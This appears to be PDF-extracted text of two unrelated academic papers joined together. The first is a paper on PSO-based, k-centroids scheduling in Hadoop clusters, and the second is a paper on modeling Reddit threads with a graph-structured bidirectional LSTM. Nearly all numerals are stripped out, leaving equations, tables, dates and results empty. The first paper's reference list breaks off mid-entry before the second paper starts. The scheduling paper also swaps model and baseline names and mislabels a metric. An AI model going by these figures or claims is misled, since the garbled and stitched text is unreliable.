the well-known clustering problem can be solved by k-means, which is one of the simplest unsupervised learning algorithms: assume k clusters and assign each cluster processor to one of them in a simple, direct way. however, k-means clustering does not guarantee an optimal solution, since its performance depends on the initial centroids. thus, the proposed system uses a partitioning clustering, namely k-centroids clustering, as described in the following algorithm. table i shows the notation and descriptions employed in the proposed system. fig. shows an overall flow diagram of the proposed k-centroids clustering in the hadoop cluster.

algorithm: k-centroids clustering
input: cluster processors cpn, k value
begin:
  initialize k centroids ck
  for i = , , … n then        // cluster resource property
    while (curr_index < k) then
      if sim[i][curr_index] < min then
        min = sim[i][curr_index]
        min_index = curr_index;
      end if
      curr_index++;
    end while
    setclusterid(min_index);
  end for i;
end begin;

the inputs taken for the above k-centroids clustering algorithm are the cluster processors and the k value. at first, the k centroids are initialized and two vectors are defined with respect to the retrieving time, the cluster processing speed, and the size of the cluster resource. from these vectors, the cosine similarity is estimated. the similarity measure at the current index is then compared against the minimum value seen so far; if it is smaller, it becomes the new minimum. this check repeats until the current index reaches k, and the minimum index is set as the cluster id. further, the fitness function is estimated, considering the load, energy, and time of each cluster, until all jobs are scheduled. it is defined as:

f(n) = t(i,r) + l(i,r) + e(i,r)

. . time computation
the time to complete the ith cluster on the rth cluster resource is described as:

t(i,r) = it_r + et(i,r) + rt(i,r)

where the executing time et(i,r) and the retrieving time rt(i,r) of the ith cluster on the rth cluster resource are given in equation ( ) and equation ( ), respectively. herein, bw_sr is the bandwidth from the scheduler to the receiver, and δ_sr denotes the delay that occurs between the scheduler and the receiver for network communication.

. . load computation
the load of the rth cluster resource at the ith cluster submission is computed as in equation ( ).

. . energy computation
the energy required for the ith cluster on the rth cluster resource is defined as:

e(i,r) = ie_r + ee(i,r)

where the execution energy of the ith cluster on the rth cluster resource is given as:

ee(i,r) = cs * cpe_r

based on the consideration of time, load, and energy, the proposed fitness function has the following advantages:
• the scheduling delay can be avoided in the initial stage.
• the computation cost is minimized.
• the execution time is decreased.

. pso based disparateness-aware scheduling model
heuristic optimization algorithms are widely used for solving a wide variety of np-complete problems. pso is considered one of the latest evolutionary optimization techniques and has fewer algorithm parameters than other approaches.
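before the formal algorithm listing below, the following python sketch illustrates how the fitness f(n) = t(i,r) + l(i,r) + e(i,r) defined above could drive a simple pso-style choice of computing node; the resource attributes, the surrogate load and energy terms, and the pso hyperparameters are illustrative assumptions rather than the authors' implementation.

# illustrative sketch: score candidate cluster resources with f = t + l + e and
# pick one with a tiny particle swarm search. resource attributes, surrogate
# terms, and hyperparameters are assumptions made for this example only.
import random

resources = [
    # (name, processing speed [hz], bandwidth [b/s], network delay [s], load, power [w])
    ("node-a", 2.0e9, 100e6, 0.02, 0.60, 95.0),
    ("node-b", 2.6e9, 250e6, 0.05, 0.35, 120.0),
    ("node-c", 1.8e9, 500e6, 0.01, 0.80, 80.0),
]

def fitness(job_size, res):
    # f(n) = t(i,r) + l(i,r) + e(i,r), using simple surrogate terms
    _, speed, bw, delay, load, power = res
    exec_time = job_size / speed               # stands in for et(i,r)
    retrieve_time = job_size / bw + delay      # stands in for rt(i,r): bw_sr and delta_sr
    t = exec_time + retrieve_time              # it_r taken as 0 in this toy example
    l = load                                   # stands in for l(i,r)
    e = power * exec_time                      # stands in for e(i,r)
    return t + l + e

def pso_select(job_size, n_particles=8, iters=30, w=0.7, c1=1.5, c2=1.5):
    # very small pso over a continuous position that is rounded to a resource index
    hi = len(resources) - 1
    pos = [random.uniform(0, hi) for _ in range(n_particles)]
    vel = [0.0] * n_particles
    pbest = list(pos)
    pbest_val = [fitness(job_size, resources[round(p)]) for p in pos]
    g = min(range(n_particles), key=lambda i: pbest_val[i])
    gbest, gbest_val = pbest[g], pbest_val[g]
    for _ in range(iters):
        for i in range(n_particles):
            vel[i] = (w * vel[i]
                      + c1 * random.random() * (pbest[i] - pos[i])
                      + c2 * random.random() * (gbest - pos[i]))
            pos[i] = min(max(pos[i] + vel[i], 0.0), float(hi))
            val = fitness(job_size, resources[round(pos[i])])
            if val < pbest_val[i]:
                pbest[i], pbest_val[i] = pos[i], val
                if val < gbest_val:
                    gbest, gbest_val = pos[i], val
    return resources[round(gbest)][0], gbest_val

print(pso_select(job_size=5e8))   # prints the selected node name and its fitness

with only three candidate nodes an exhaustive scan would of course suffice; the swarm is included only to mirror the role pso plays in the scheduling model described next.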
algorithm : disparateness-aware scheduling using pso input : cluster list jn , cluster resource crm output : allocated cluster list aln begin for x = , , … n then tgr = ; // temporary cluster resource list for y= , , … m then if (jx . rtype(). equals( cry . rtype() ) then tcr.add (cry) end if; end fory; scr = pso (tcr, jx ) // selected cluster resource jx . setclusterresource scr alx ← sgr end for x; end begin; the inputs taken for this model are cluster list and the cluster resource. initially, the temporary cluster resource list is empty and the similarity should be further verified. it checks whether the resource type of cluster list is similar to the resource type of cluster resource. if the verification is similar, then the cluster resources are added to the temporary cluster resource list. the technique of pso is applied for the temporary cluster resource list and the cluster list to accomplish the selected cluster resource. the final output obtained in this scheduling model is the allocated cluster resource along with the selected cluster resource. when a failure occurs during this process, it can be recomputed by pso and the other optimal node will be predicted. the advantages over the heterogeneous-aware scheduling model are: a disparateness-aware scheduling using k-centroids clustering and pso techniques in hadoop cluster international journal of advanced network monitoring and controls year , no.  minimize the number of failures  increases the resource utilization . performance analysis this section compares the performance of the proposed disparateness-aware scheduling (das) algorithm with two existing scheduling algorithms: height priority first (hpf)[ ] and weighted round robin (wrr)[ ].the performance metrics used for the analysis are: system reliability, scheduling delay, scheduling length, speed up, energy consumption, and failure ratio with respect to the number of clusters. due to the dynamic resource availability, the behavior of scheduling algorithms on real cluster platforms is not practical. the simulation is the optimum choice for testing and comparing the scheduling algorithms, where the experiments on real platforms are often non-reproducible. thus, an extensive simulation environment of cluster system is built as in table . table. simulation parameters . system reliability vs. number of clusters the reliability of the system can be calculated by the average reliability of all clusters and is mathematically defined as follows: ( ) here, r[eak] is the distribution of the reliability probability of clusters ak , and n is the number of clusters. fig. describes the system reliability in terms of the number of clusters for the existing hpf and wrr and the proposed das model. the system reliability of das model is greater than the other two existing approaches, where its value is gradually decreased with respect to the number of clusters. fig. the result of system reliability with respect to the number of clusters . scheduling length vs. number of clusters schedule length is measured as: sl=max{sl(a ), sl(a ),…, sl(an) ( ) fig. the result of schedule length with respect to the number of clusters. fig. depicts the result of the schedule length in terms of number of clusters for the existing hpf and wrr and the proposed das model. the schedule length is lower than the other two existing systems. . speed up vs. number of clusters the speed up is the ratio of the sequential execution time to the schedule length of the output schedule. 
it is computed as follows: ( ) a disparateness-aware scheduling using k-centroids clustering and pso techniques in hadoop cluster international journal of advanced network monitoring and controls year , no. fig. shows the result of speed up with respect to the number of clusters for the existing hpf and wrr and the proposed das model. the speed up of has model is higher than the other two existing approaches, where its value is gradually increasing with regard to the number of clusters. fig. the result of speed up with respect to the number of clusters. . scheduling delay vs. number of cluster resource fig. the result of scheduling delay with respect to the number of cluster resources. fig. shows the result of scheduling delay with respect to the number cluster resource for the existing hrds and mcms and the proposed has model. the proposed system has a lower scheduling delay than the other two scheduling algorithms. . energy consumption vs. number of cluster resource fig. shows the result of energy consumption with respect to the number cluster resource for the existing hpf and wrr and the proposed das model. the proposed system consumes less energy than the other two scheduling algorithms. its value gradually increases in regards to the number of cluster resource. fig. the result of energy consumption with respect to the number of cluster resource. . failure ratio vs. number of cluster resource the result of the scheduling delay with respect to the number cluster resource for the existing hpf and wrr and the proposed das model is shown in fig. . the proposed system has a lower failure ratio than the other two existing scheduling algorithms. fig. the result of failure ratio with respect to the number of cluster resource. . conclusion and future work this paper proposes a ―disparateness-aware scheduling algorithm in the cluster environment. in this research work we represent k-centroids clustering in big data mechanism for hadoop cluster. this approach is mainly focused on the energy consumption in the hadoop cluster, which helps to increase the system reliability. the hadoop cluster consists of resources which are categorized for minimizing the scheduling delay in the hadoop cluster using the k-centroids clustering algorithm. a novel provisioning mechanism is introduced along with the consideration of load, energy, and network time. by integrating these three parameters, the optimized fitness function is employed for particle swarm optimization (pso) to select the computing node. failure may a disparateness-aware scheduling using k-centroids clustering and pso techniques in hadoop cluster occur after completion of the successful execution in the network. to improve the fault tolerance service, the migration of the cluster is focused on the particular failure node. this can recomputed the node by pso and the corresponding optimal node is predicted. the experimental results exhibit better scheduling length, scheduling delay, speed up, failure ratio, energy consumption than the existing systems. references [ ]v. mayer-schonberger, k. cukier, big data: a revolution that will transform how we live, work, and think, houghton mifflin harcourt, . [ ]a. cuzzocrea, privacy and security of big data: current challenges and future research perspectives, in: proceedings of the first international workshop on privacy and securityof big data, psbd ’ , . [ ]big data, nature ( ) ( ) – . [ ]dealing with data, science ( ) ( ) – . [ ]c. o’neil, r. 
schutt, doing data science: straight talk from the frontline, o’reilly media, inc., . [ ]big data, http://en.wikipedia.org/wiki/big_data, . [ ]g. li, x. cheng, research status and scientific thinking of big data, bull. chin. acad. sci. ( ) ( ) – . [ ]y. wang, x. jin xueqi, network big data: present and future, chinese j. comput. ( ) ( ) – . [ ]x.-q. cheng, x. jin, y. wang, j. guo, t. zhang, g. li, survey on big data system and analytic technology, j. softw. ( ) ( ) – . [ ] j.dean,s.ghemawa.mapreduce:simplified data processing on large cluster.osdi’ ,sixth symposium on operating system design and implementation, sanfrancisco , ca ,december, [ ]http://www.vmware.com/appliances/directory/up loaded_files/what% is% hadoop.pdf. [ ] haiyang li ―pwbrr algorithm of hadoop platform. international journal of advanced network monitoring and controls year , no. conversation modeling on reddit using a graph-structured lstm victoria zayats electrical engineering department university of washington vzayats@uw.edu mari ostendorf electrical engineering department university of washington ostendor@uw.edu abstract this paper presents a novel approach for mod- eling threaded discussions on social media using a graph-structured bidirectional lstm (long-short term memory) which represents both hierarchical and temporal conversation structure. in experiments with a task of predicting popularity of comments in reddit discussions, the proposed model outperforms a node-independent architecture for different sets of input features. analyses show a bene- fit to the model over the full course of the dis- cussion, improving detection in both early and late stages. further, the use of language cues with the bidirectional tree state updates helps with identifying controversial comments. introduction social media provides a convenient and widely used platform for discussions among users. when the comment-response links are preserved, those con- versations can be represented in a tree structure where comments represent nodes, the root is the original post, and each new reply to a previous com- ment is added as a child of that comment. some examples of popular services with tree-like struc- tures include facebook, reddit, quora, and stack- exchange. figure shows an example conversa- tion on reddit, where bigger nodes indicate higher upvoting of a comment. in services like twitter, the tool https://whichlight.github.io/ reddit-network-vis was used to obtain this visualiza- tion. figure : visualization of a sample thread on reddit. tweets and their retweets can also be viewed as form- ing a tree structure. when time stamps are avail- able with a contribution, the nodes of the tree can be ordered and annotated with that information. the tree structure is useful for seeing how a discussion unfolds into different subtopics and showing differ- ences in the level of activity in different branches of the discussion. predicting popularity of comments in social me- dia is a task of growing interest. popularity has been defined in terms of the volume of the re- sponse, but when the social media platform has a mechanism for readers to like or dislike com- ments (or, upvote/downvote), then the difference in positive/negative votes provides a more informative score for popularity prediction. this definition of transactions of the association for computational linguistics, vol. , pp. – , . action editor: ani nenkova. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. 
distributed under a cc-by . license. (a) forward hierarchical and timing structure (b) backward hierarchical and timing structure figure : an example of model propagation in a graph-structured lstm. here, the node name are shown in a chrono- logical order, e.g. comment t was made earlier than t . (a) propagation of graph-structured lstm in the forward direction. blue arrows represent hierarchical propagation, green arrows represent timing propagation. (b) backward hierarchical (blue) and timing (green) propagation of graph-lstm. popularity, which has also been called community endorsement (fang et al., ), is the task of inter- est in our work on tree-structured modeling of dis- cussions. previous studies found that the time when the comment/post was published has a big impact on its popularity (lakkaraju et al., ). in addition, the number of immediate responses can be predic- tive of the popularity, but some comments with a high number of replies can be either controversial or have a highly negative score. language should be extremely important for distinguishing these cases. indeed, community style matching is shown to be correlated to comment popularity in reddit (tran and ostendorf, ). however, learning useful lan- guage cues can be difficult due to the low frequency of these events and the dominance of time, topic and other factors. thus, in several prior studies, au- thors constrained the problem to reduce the effect of those factors (lakkaraju et al., ; tan et al., ; jaech et al., ). in this study, we have no such constraints, but attempt to use the tree structure to capture the flow of information in order to better model the context in which a comment is submitted, including both the history it responds to as well as the subsequent response to that comment. to capture discussion dynamics, we introduce a novel approach to modeling the discussion using a bidirectional graph-structured lstm, where each comment in the tree corresponds to a single lstm unit. in one direction, we capture the prior his- tory of contributions leading up to a node, and in the other, we characterize the response to that com- ment. motivated by prior findings that both response structure and timing are important in predicting pop- ularity (fang et al., ), the lstm units include both hierachical and temporal components to the up- date, which distinguishes this work from prior tree- structured lstm models. we assess the utility of the model in experiments on popularity prediction with reddit discussions, comparing to a neural net- work baseline that treats comments independently but leverages information about the graph context and timing of the comment. we analyze the results to show that the graph lstm provides a useful sum- mary representation of the language context of the comment. as in fang et al. ( ), but unlike other work (he et al., ), our model makes use of the full discus- sion thread in predicting popularity. while knowl- edge of the full discussion is only useful for post- hoc analysis of past discussions, it is reasonable to consider initial responses to a comment, particularly given that many responses occur within minutes of someone posting a comment. comments are often popular because of witty analogies made, which re- quires knowledge of the world beyond what is cap- tured in current models. responses to these com- ments, as well as to controversial comments, can improve popularity prediction. 
responses of others clearly influence the likelihood of someone to like or dislike a comment, but also whether they even read a comment. by introducing a forward-backward tree- structured model, we provide a mechanism for lever- aging early responses in predicting popularity, as well as a framework for better understanding the rel- ative importance of these responses. the main contributions of this paper include: a novel approach for representing tree-structured lan- guage processes (e.g., social media discussions) with lstms; evaluation of the model on the pop- ularity prediction task using reddit discussions; and analysis of the performance gains, particularly with respect to the role of language context. method the proposed model is a bidirectional graph lstm that characterizes a full threaded discussion, assum- ing a tree-structured response network and account- ing for the relative order of the comments. each comment in a conversation corresponds to a node in the tree, where its parent is the comment that it is re- sponding to and its children are the responding com- ments that it spurs ordered in time. each node in the tree is represented with a single recurrent neural net- work (rnn) unit that outputs a vector (embedding) that characterizes the interim state of the discussion, analogous to the vector output of an rnn unit which characterizes the word history in a sentence. in the forward direction, the state vector can be thought of as a summary of the discussion pursued in a partic- ular branch of the tree, while in the backward di- rection the state vector summarizes the full response subtree that followed a particular comment. the state vectors for the forward and backward direc- tions are concatenated for the purpose of predicting comment karma. the rnn updates – both forward and backward – incorporate both temporal and hier- archical (tree-structured) dependencies, since com- menters typically consider what has already been said in response to a parent comment. hence, we refer to it as a graph-structured rnn rather than a tree-structured rnn. figures (a) and (b) show an example of the state connections associated with hi- erarchical and timing structures for the forward and backward rnns, respectively. the supervision signal in training will impact the character of the state vector, and the forward and backward state sub-vectors are likely to capture dif- ferent phenomena. here, the objective is to predict quantized comment karma. we anticipate that the forward state will capture relevance and informa- tiveness of the comment, and the backward process will capture sentiment and richness of the ensuing discussion. the specific form of the rnn used in this work is an lstm. the detailed implementation of the model is described in the sections to follow. . graph-structured lstm each node in the tree is associated with an lstm unit. the input xt is an embedding that can incorpo- rate both comment text and local submission context features associated with thread structure and timing, described further in section . . the node state vec- tor ht is generated using a modification of the stan- dard lstm equations to include both hierarchical and timing structures for each comment. specifi- cally, we use two forget gates - one for the previous (or subsequent) hierarchical layer, and one for the previous (or subsequent) timing layer. in order to describe the update equations, we introduce notation for the hierarchical and timing structure. 
in figure , the nodes in the tree are num- bered in the order that the comments are contributed in time. to characterize graph structure, let π(t) de- note the parent of t and κ(t) its first child. time structure is represented only among a set of siblings: p(t) is the sibling predecessor in time, and s(t) is the sibling successor. the pointers κ(t), p(t) and s(t) are set to ∅ when t has no child, predecessor, or suc- cessor, respectively. for example, in figure (a), the node t will have π(t ) = t , κ(t ) = t , p(t ) = ∅ and s(t ) = t , and the node t will have π(t ) = t , κ(t ) = ∅, p(t ) = t and s(t ) = t . below we provide the update equations for the forward process, using the subscripts i, f, g, c, and o for the input gate, temporal forget gate, hier- archichal forget gate, cell, and output, respectively. the vectors it, ft, and gt are the weights for new in- formation, remembering old information from sib- lings, and remembering old information from the parent, respectively. σ is a sigmoid function, and ◦ indicates the hadamard product. if p(t) = ∅, then hp(t) and cp(t) are set to the initial state value. it = σ(wixt + uihp(t) + vihπ(t) + bi) ft = σ(wfxt + ufhp(t) + vfhπ(t) + bf) gt = σ(wgxt + ughp(t) + vghπ(t) + bg) c̃t = wcxt + uchp(t) + vchπ(t) + bc ct = ft ◦ cp(t) + gt ◦ cπ(t) + it ◦ c̃t ot = σ(woxt + uohp(t) + vohπ(t) + bo) ht = ot ◦ tanh(ct) when the whole tree structure is known, we can take advantage of the full response subtree to bet- ter represent the node state. to that end, we define a backward lstm that has a similar set of update equations except that only the first child will pass the hidden state to its parent. specifically, the update equations are the same except that π(t) is replaced with κ(t), p(t) is replaced with s(t), and a different set of weight matrices and bias vectors are learned. let + and − indicate forward and backward em- beddings respectively. on top of the lstm unit, the forward and backward state vectors are concatenated and passed to a softmax layer to predict quantized karma levels: p(yt = j|x,h) = exp(w j s [h + t ;h − t ])∑ k= exp(w k s [h + t ;h − t ]) where x and h correspond to the set of input features and state vectors (respectively) for all nodes in the discussion. . input features the full model includes two types of features in the input vector, including non-textual features associ- ated with the submission context and the textual fea- tures of the comment at that node. the submission context features are extracted from the graph and metadata associated with the comment, motivated by prior work showing that context factors such as the forum, timing and au- thor of a post are very useful in predicting popular- ity. the submission context features include: • timing: time since root, time since parent (in hours), number of later comments, and number of previous comments • author: a binary indicator as to whether the au- thor is the original poster, and number of com- ments made by the author in the conversation • graph-location: depth of the comment (dis- tance from the root), and number of siblings • graph-response: number of children (direct replies to the comment), height of the sub- tree rooted from the node, size of that subtree, number of children normalized for each thread ( normalization techniques), subtree size nor- malized for each thread ( normalization tech- niques). 
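to make the forward update written out earlier in this section concrete, the following numpy sketch performs one cell update with the two forget gates (temporal f_t over the sibling predecessor p(t) and hierarchical g_t over the parent π(t)); the dimensions, random initialization, and toy inputs are illustrative assumptions and not the released implementation.

# minimal numpy sketch of one forward graph-lstm cell update as in the equations above.
# dimensions, initialization, and the toy inputs are illustrative assumptions.
import numpy as np

rng = np.random.default_rng(0)
d_in, d_h = 4, 8   # input embedding size and hidden state size (illustrative)

def init(shape):
    return rng.normal(scale=0.1, size=shape)

# one (input, sibling-predecessor, parent) weight triple plus a bias per gate
W = {g: init((d_h, d_in)) for g in "ifgco"}   # w_i, w_f, w_g, w_c, w_o
U = {g: init((d_h, d_h)) for g in "ifgco"}    # u_* applied to h_{p(t)}
V = {g: init((d_h, d_h)) for g in "ifgco"}    # v_* applied to h_{pi(t)}
b = {g: np.zeros(d_h) for g in "ifgco"}

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def forward_cell(x_t, h_prev_sib, c_prev_sib, h_parent, c_parent):
    # state update for node t given its sibling predecessor p(t) and parent pi(t)
    pre = {g: W[g] @ x_t + U[g] @ h_prev_sib + V[g] @ h_parent + b[g] for g in "ifgco"}
    i_t = sigmoid(pre["i"])           # input gate
    f_t = sigmoid(pre["f"])           # temporal (sibling) forget gate
    g_t = sigmoid(pre["g"])           # hierarchical (parent) forget gate
    c_tilde = pre["c"]                # candidate cell; kept linear, as in the update above
    c_t = f_t * c_prev_sib + g_t * c_parent + i_t * c_tilde
    o_t = sigmoid(pre["o"])           # output gate
    h_t = o_t * np.tanh(c_t)
    return h_t, c_t

# toy usage: a root comment has no sibling predecessor and no parent (zero initial states),
# while its first reply takes the root's state as the parent contribution.
h0 = c0 = np.zeros(d_h)
x_root = rng.normal(size=d_in)        # stands in for the input features of the root
h_root, c_root = forward_cell(x_root, h0, c0, h0, c0)
x_reply = rng.normal(size=d_in)
h_reply, c_reply = forward_cell(x_reply, h0, c0, h_root, c_root)
print(h_reply.shape)                  # (8,)

the backward pass mirrors this update with κ(t) and s(t) in place of π(t) and p(t) and its own weights, and the concatenated forward and backward state vectors feed the softmax over karma levels.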
two methods are used to normalize the subtree size and number of children to compensate for variation associated with the size of the discussion, specif- ically: i) subtract the mean feature value in the thread, and ii) divide by the square root of the rank of the feature value in the thread. these features are a superset of those used in fang et al. ( ). the subvector including all these fea- tures is denoted xst . the comment text features, denoted xct, are gen- erated using a simple average bag-of-words repre- sentation learned during the training: xct = n n∑ i= w ie where w ie is an embedding of the i-th word in the comment, and n is the number of words in the comment. comments longer than words were truncated to reduce noise associated with long com- ments, assuming that the early portion carries the most information. the percentage of the comments that exceed words is around %− % for the subreddits used in the study. in all experiments, the word embedding dimension is d = , and the vo- cabulary includes only words that occurred at least times in the dataset. the input vector xt is set to either xst or [x s t;x c t], depending on whether the experiment uses text. . pruning often the number of comments in a single subtree can be large, which leads to high training costs. a large percentage of the comments are low karma and minimally relevant for predicting karma of neigh- bors, and many can be easily identified with simple graph and timing features (e.g. having no replies or contributed late in the discussion). therefore, we introduce a preprocessing step that identifies com- ments that are highly likely to be low karma to de- crease the computation cost. we then assign these nodes to be level and prune them out of the tree, but retain a count of nodes pruned for use in a count- weighted bias term in the update to capture informa- tion about response volume. for detecting low karma comments, we train a simple svm classifier to identify comments at the karma level based on the submission context fea- tures. if a pruned comment leads to a disconnected graph (e.g., an internal node is pruned but not its children), then the comment is retained in the tree. in testing, all pruned comments are given a predicted level of and accounted for in the evaluation. the state updates have an additional bias term for any nodes that have subsequent sibling or children comments pruned. for example, consider figure , if nodes {t , t , t , t } are pruned, then t will have a modified forward update, and t , t will have a modified backwards update. at node t, define mκt to be the number of levels pruned below it, mpt as the number of immediately preceeding comments pruned in its subgroup (responding to the same par- ent), and mst as the number of subsequent comments pruned in its subgroup plus the non-initial comments in the associated subtrees. in the example above, mκ = , m s = , m s = , m p = , and all other m∗t = . the pointers are updated reflect the structure of the pruned tree, so p( ) = , s( ) = , s( ) = ∅. the bias vectors rκ, rp and rs are as- sociated with the different sets of nodes pruned. let + and − indicate forward and backward em- beddings, respectively. the forward update has an adjusted predecessor contribution (h+ p(t) + m p t rp). the backward update adds mst rs + m κ t rκ to either h− s(t) or h− κ(t) , depending on whether it is a time or hierarchical update, respectively. . training the objective function is minimum cross-entropy over the quantized levels. 
all model parame- ters are jointly trained using the adadelta optimiza- tion algorithm (zeiler, ). word embeddings subreddit comments threads vocab size askwomen . m . k k askmen . m . k k politics . m . k k table : data statistics. subreddit prec rec % pruned askwomen . . . askmen . . . politics . . . table : precision and recall of the pruning classifier and percentage of comments pruned. are initialized using word vec skip-gram embed- dings (mikolov et al., ) trained on all com- ments from the corresponding subreddit. the code is implemented in theano (team et al., ) and is available at https://github. com/vickyzayats/graph-lstm.we tune the model over different dimensions of the lstm unit, and use the performance on the development set as a stopping criteria for the training. experiments . data reddit is a popular discussion forum platform con- sisting of a large number of subreddits focusing on different topics and interests. in our study, we exper- imented with subreddits: askwomen, askmen, and politics. all the data consists of discussions made in the period between january , and january , . table shows the total amount of data used for each of the subreddits. for each subreddit, the threads were randomly distributed between training, development (dev) and test sets with the proportions of : : . the performance of the pruning classifier on the dev set is presented in table . . task and evaluation metrics reddit karma has a zipfian distribution, highly skewed toward the low-karma comments. since the rare high karma comments are of greatest interest in popularity prediction, fang et al. ( ) proposes a https://reddit.com task of predicting quantized karma (using a nonlin- ear head-tail break rule for binning) with evaluation using a macro average of the f scores for predict- ing whether a comment exceeds each different level. experiments reported here use this framework. specifically, all the comments with karma lower than are assigned to level , and each subsequent level corresponds to karma less than or equal to the median karma in the rest of the comments based on the training data statistics. each subreddit has quantized karma levels based on its karma distribu- tion. there are binary subtasks (does the comment have karma at level j or higher for j = , . . . , ), and the scoring metric is the macro average of f (j). for tuning hyperparameters and as a stopping cri- terion, we use a linearly weighted average of f scores to increase the weight on high karma com- ments, which gives slightly better performance for the high karma cases but has only a small effect on the macro average. . baseline and contrast systems we compare the graph lstm to a node-independent baseline, which is a feedforward neural network model consisting of input, hidden and softmax lay- ers. this model is a simplification of the graph- lstm model where there is no connection between nodes. the node-independent model characterizes a comment without reference to either the text of the comment that it is responding to or the comments reacting to it. however, the model does have in- formation on the size of the response subtree via the submission context input features. both node- independent and graph-structured models are trained with the same cost function and tuned over the same set of hidden layer dimensions. we contrast performance of both architectures with and without using the text of the comment it- self. as shown in fang et al. 
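as a toy illustration of this metric, the sketch below computes the binary f1 score for exceeding each karma level and then macro-averages the per-level scores; the helper names and the example labels are our own.

# toy sketch of the evaluation described above: for each level j >= 1, score the binary
# task "does the comment reach level j or higher" with f1, then macro-average over levels.
def f1_at_level(y_true, y_pred, level):
    tp = sum(1 for t, p in zip(y_true, y_pred) if t >= level and p >= level)
    fp = sum(1 for t, p in zip(y_true, y_pred) if t < level and p >= level)
    fn = sum(1 for t, p in zip(y_true, y_pred) if t >= level and p < level)
    if tp == 0:
        return 0.0
    precision, recall = tp / (tp + fp), tp / (tp + fn)
    return 2 * precision * recall / (precision + recall)

def macro_f1(y_true, y_pred, n_levels):
    scores = [f1_at_level(y_true, y_pred, j) for j in range(1, n_levels + 1)]
    return sum(scores) / len(scores), scores

# made-up quantized karma levels 0..3 for eight comments
y_true = [0, 0, 1, 2, 3, 0, 1, 3]
y_pred = [0, 1, 1, 2, 2, 0, 0, 3]
avg, per_level = macro_f1(y_true, y_pred, n_levels=3)
print(per_level, avg)   # per-level f1 scores and their macro average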
( ), simply using submission context features (graph, timing, author) gives a strong baseline. in order to evaluate the role of each direction (forward or backward) in the graph-structured model, we also present results using only the forward direction graph-lstm for comparison to the bidirectional model. in addition, in order to evaluate the importance of the language of the comment itself vs. the language used in the rest of the tree, we perform an interpolation between the graph-lstm with no language features and the node-independent model with language features. the relative weight for the two models is tuned on the development set.

table : average f score of karma level prediction for node-independent (indep) vs. graph-structured (graph) models with and without text features; interp corresponds to an interpolation of the graph-structured model without text and the node-independent model with text; and graph(f) corresponds to a graph-structured model that contains the forward direction only.
model    | text | askwomen | askmen | politics
indep    | no   | .        | .      | .
graph    | no   | .        | .      | .
indep    | yes  | .        | .      | .
interp   | mix  | .        | .      | .
graph(f) | yes  | .        | .      | .
graph    | yes  | .        | .      | .

. karma level prediction

the results for the average f scores on the test set are presented in table . in experiments for all the subreddits, graph-structured models outperform the corresponding node-independent models both with and without language features. language features also give a greater performance gain when used in the graph-lstm models. the fact that the forward graph improves over the interpolated models shows that it is not simply the information in the current node that matters for karma of that node. finally, while the full model outperforms the forward-only version for all the subreddits, the gain is smaller than that obtained by the forward direction alone over the node-independent model, so the forward direction seems to be more important.

the karma prediction results (f score) at the different levels are shown in figure . while in the askmen and askwomen subreddits the overall performance decreases for higher levels, the politics subreddit has the opposite trend. this may be due in part to the lower pruning recall in the politics subreddit, but fang et al. ( ) also observe higher performance for high karma levels in the politics subreddit.

figure : f scores as a function of the quantized levels for different model configurations.

analysis

here, we present analyses aimed at better understanding the behavior of the graph-structured model and the role of language in prediction. all analyses are performed on the development set. the analyses are motivated by considering possible scenarios that are exceptions to the easy cases, which are: i) comments that are contributed early in the discussion and spawn large subtrees, likely to have high karma, and ii) comments with small subtrees that typically have low karma. we hypothesized three scenarios where the bidirectional graph-lstm with text might be useful. one case is controversial comments, which have large subtrees but do not have high karma because of downvotes; these tend to have overprediction of karma when using only submission context. the other two scenarios involve underprediction of karma when using only submission context.
early comments associated with few children and a more narrow subtree (see the downward chain in figure ) may spawn popular new threads and benefit from the popularity of other comments in the thread (more readers attracted), thus having higher popularity than the number of children suggests. lastly, comments that are clever or humorous discussion endpoints might have high popularity but small subtrees. these two cases tend to differ in their relative timing in the discussion.

. karma prediction vs. time

the first study looked at where the graph-lstm provides benefits in terms of timing. we plot the average f score as a function of the contribution time in figure . as an approximation for time, we use the quantized number of comments made prior to the current comment. the plots show that the graph-structured model improves over the node-independent model throughout the discussion. relative gains are larger towards the end of discussions, where the node-independent performance is lower. a similar trend is observed when plotting average f as a function of depth in the discussion tree.

figure : average f scores as a function of time, approximated using the number of previous comments quantized in increments of .

while the use of text in the graph-lstm seems to help throughout the discussion, we hypothesized that there would be different cases where it might help, and these would occur at different times. indeed, % of the comments that are overpredicted by more than  levels by the node-independent model without text (controversial comments) occur in the first % of the discussion. comments that are underpredicted by more than  occur throughout the discussion and are roughly uniform ( – %) over the first half of the discussion, but then quickly ramp down. high-karma comments are rare at the end of the discussion; less than % of the underpredicted comments are in the last %.

. importance of responses

in order to see how the model benefits from using the language cues in underpredicted and overpredicted scenarios, we look at the size of errors made by the graph-lstm model with and without text features. in figure , the x-axis indicates the error between the actual karma level and the karma level predicted by the graph-lstm using submission context features only. the negative errors represent the overpredicted comments, and the positive errors represent the underpredicted comments. the y-axis represents the average error between the actual karma level and the karma level predicted by the model using both submission context and language features. the x = y identity line corresponds to no benefit from language features. results are presented for the politics subreddit; other subreddits have similar trends but smaller differences for the underpredicted cases.

we compare two models – bidirectional and forward direction graph-structured lstm – in order to understand the role of the language of the replies vs. the comment and its history. we find that, for the bidirectional graph-lstm model, language is helping identify overpredicted cases more than underpredicted ones. the forward direction model also outperforms the node-independent model, but has less benefit in overpredicted cases, consistent with our intuition that controversy is identifiable based on the responses. although the comment text input is simply a bag of words, it can capture the mixed sentiment of the responses. while it is not represented in the plot, larger errors are much less frequent.
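the bucketed comparison just described can be reproduced in a few lines; the sketch below assumes integer karma levels aligned across one gold list and two prediction lists, and the function name is our own.

```python
from collections import defaultdict
import numpy as np

def error_vs_error(gold, pred_no_text, pred_with_text):
    """For each signed error of the context-only model (negative = over-prediction,
    positive = under-prediction), report the average signed error of the model
    that also uses text. Inputs are sequences of integer karma levels, aligned by comment."""
    buckets = defaultdict(list)
    for g, p0, p1 in zip(gold, pred_no_text, pred_with_text):
        buckets[g - p0].append(g - p1)
    # Points on the x = y line would indicate no benefit from language features.
    return {err: float(np.mean(vals)) for err, vals in sorted(buckets.items())}
```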
looking at average f as a function of the number of children (direct responses), we found that the graph-lstm mainly benefits nodes that have a small number of children, consistent with the two underprediction scenarios hypothesized. however, many underpredicted cases are not impacted, since errors due to pruning contribute to – % of the underpredicted cases, depending on the subreddit (highest for politics). this explains the smaller gains for the positive side of figure .

. language use analysis

to provide insights into what the model is learning about language, we looked at individual words associated with different categories of comments, as well as examples of the different error cases.

